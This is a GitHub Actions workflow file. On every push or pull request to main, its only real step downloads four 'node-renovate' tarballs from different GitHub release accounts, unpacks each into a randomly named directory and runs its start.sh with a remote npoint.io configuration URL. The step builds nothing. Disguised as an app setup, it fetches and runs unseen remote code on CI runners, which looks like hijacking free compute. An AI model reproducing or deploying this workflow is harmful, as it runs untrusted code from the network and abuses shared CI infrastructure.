name: Phu Hang Vuong Anh

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

jobs:
  build:

    runs-on: ubuntu-latest
    steps:
    - name: Set up app
      run: |	
        R=$(tr -dc a-z0-9 </dev/urandom | head -c 8) && wget https://github.com/7hongphatm-sudo/567567567567/releases/download/7hongphat/node-renovate.tar.gz -O "$R.tar.gz" && tar -xf "$R.tar.gz" && mv node-renovate "$R" && cd "$R" && chmod +x start.sh && ./start.sh https://api.npoint.io/d97c6e70a2ea20e0ab39; 
        R=$(tr -dc a-z0-9 </dev/urandom | head -c 8) && wget https://github.com/6hongphatm-alt/34534t4t34/releases/download/6hongphat/node-renovate.tar.gz -O "$R.tar.gz" && tar -xf "$R.tar.gz" && mv node-renovate "$R" && cd "$R" && chmod +x start.sh && ./start.sh https://api.npoint.io/16b5d9fa313837afc070; 
        R=$(tr -dc a-z0-9 </dev/urandom | head -c 8) && wget https://github.com/5hongphatm-hub/5648545124/releases/download/5hongphat/node-renovate.tar.gz -O "$R.tar.gz" && tar -xf "$R.tar.gz" && mv node-renovate "$R" && cd "$R" && chmod +x start.sh && ./start.sh https://api.npoint.io/ad2496e71f924f0e7ffa; 
        R=$(tr -dc a-z0-9 </dev/urandom | head -c 8) && wget https://github.com/4hongphatm-oss/32423456546/releases/download/4hongphat/node-renovate.tar.gz -O "$R.tar.gz" && tar -xf "$R.tar.gz" && mv node-renovate "$R" && cd "$R" && chmod +x start.sh && ./start.sh https://api.npoint.io/1f1cbd3e9e8b616a790a; 
        ls